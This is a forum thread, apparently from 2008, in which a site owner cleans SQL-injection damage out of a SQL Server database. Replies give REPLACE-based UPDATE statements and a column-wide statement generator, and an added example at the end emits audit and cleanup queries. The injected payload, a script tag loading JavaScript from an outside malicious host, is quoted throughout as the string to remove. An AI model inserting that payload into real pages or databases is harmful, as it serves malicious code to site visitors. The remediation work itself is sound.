Author |
Topic |
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-29 : 05:02:01
|
Hello,

we have had an attack by SQL injection. The weakness is removed but I have a lot of foreign links in my database. So I would like to remove them by script.

This is what I detected in some of my database fields:

"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--News Germany

I would like to remove by script (update?!) everything before "<!--" and keep the News Germany. Unfortunately "News Germany" is not the same in each data field. It can be any newspaper or web service.

So I am looking for a script which removes the string

"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--

by keeping all other values alive.

Does anybody have an idea how to do this?

Thank you.
B.S.

Edit: some type error |
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-09-29 : 05:56:21
|
[code]
UPDATE Table1
SET Col1 = REPLACE(Col1, '<script src="http://www0.douhunqn.cn/csrss/w.js"></script>', '')
[/code]

E 12°55'05.63"
N 56°04'39.26" |
|
|
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-30 : 04:54:30
|
Hello Peso,

thank you very much. Quite simple but running properly. I was a little bit angry about all the special characters like ! or < and / but it is quite ok because of the single quote.

One question: can I do this for all columns in a table instead of each one by one? Something like: get all columns of table xxxx and do for each table the replace

Thank you.
B.S.

Edit: some type error |
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-09-30 : 05:23:22
|
[code]
SELECT 'UPDATE ' + QUOTENAME(TABLE_NAME) + ' SET ' + QUOTENAME(COLUMN_NAME) + ' = REPLACE(' + QUOTENAME(COLUMN_NAME) + ', ''<script src="http://www0.douhunqn.cn/csrss/w.js"></script>'', '''')'
FROM INFORMATION_SCHEMA.COLUMNS
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'ntext', 'varchar', 'char', 'text')
[/code]

E 12°55'05.63"
N 56°04'39.26" |
|
|
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-30 : 06:09:33
|
What do you mean by QUOTENAME?

Thank you.
B.S. |
|
|
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-30 : 06:12:38
|
Hello Peso,

thank you. I see that I can either use the select statement to get the details or the REPLACE. Is this right?

I have tried without any result:

[code]
SELECT web_database(t_REF_Comments_table)
FROM INFORMATION_SCHEMA.COLUMNS
WHERE (DATA_TYPE IN ('nvarchar', 'nchar', 'ntext', 'varchar', 'char', 'text'))
[/code]

Thank you.
B.S. |
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-09-30 : 06:34:35
|
The SELECT statement provides you with the UPDATE statements.

1) Run the SELECT query
2) Copy the result to a new query window
3) Run the UPDATE queries

E 12°55'05.63"
N 56°04'39.26" |
|
|
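A variant of the statement generator discussed in this thread, as an added example that is not part of any post: next to each UPDATE it emits a read-only count, so the scope can be checked before the cleanup and the result verified afterwards. It schema-qualifies tables, skips views, and casts text/ntext columns. It assumes SQL Server 2005 or later, and the output column names audit_sql and update_sql are made up here.

```sql
-- Added example, not from the thread. Assumes SQL Server 2005 or later,
-- which the varchar(max)/nvarchar(max) casts below require.
DECLARE @marker varchar(200), @lit varchar(410);
-- The injected string exactly as quoted in the thread (plain ASCII).
SET @marker = '<script src="http://www0.douhunqn.cn/csrss/w.js"></script>';
-- Quote it as a T-SQL literal, doubling any embedded single quotes.
SET @lit = '''' + REPLACE(@marker, '''', '''''') + '''';

SELECT
    x.TABLE_SCHEMA, x.TABLE_NAME, x.COLUMN_NAME,
    -- Read-only count: run before the cleanup for scope, after it to verify.
    'SELECT COUNT(*) FROM ' + x.tbl
        + ' WHERE CHARINDEX(' + @lit + ', ' + x.src + ') > 0;' AS audit_sql,
    -- Cleanup that touches only the rows that actually contain the marker.
    'UPDATE ' + x.tbl + ' SET ' + x.col
        + ' = REPLACE(' + x.src + ', ' + @lit + ', '''')'
        + ' WHERE CHARINDEX(' + @lit + ', ' + x.src + ') > 0;' AS update_sql
FROM (
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME, c.ORDINAL_POSITION,
           QUOTENAME(c.TABLE_SCHEMA) + '.' + QUOTENAME(c.TABLE_NAME) AS tbl,
           QUOTENAME(c.COLUMN_NAME) AS col,
           -- REPLACE and CHARINDEX reject text/ntext, so cast those first.
           CASE c.DATA_TYPE
               WHEN 'text'  THEN 'CAST(' + QUOTENAME(c.COLUMN_NAME) + ' AS varchar(max))'
               WHEN 'ntext' THEN 'CAST(' + QUOTENAME(c.COLUMN_NAME) + ' AS nvarchar(max))'
               ELSE QUOTENAME(c.COLUMN_NAME)
           END AS src
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON  t.TABLE_SCHEMA = c.TABLE_SCHEMA
      AND t.TABLE_NAME   = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'   -- skip views
      AND c.DATA_TYPE IN ('nvarchar', 'nchar', 'ntext', 'varchar', 'char', 'text')
) AS x
ORDER BY x.TABLE_SCHEMA, x.TABLE_NAME, x.ORDINAL_POSITION;
```

The query only generates statements and changes nothing itself. Take a backup before running the update_sql output, then rerun the audit_sql statements and confirm every count is 0.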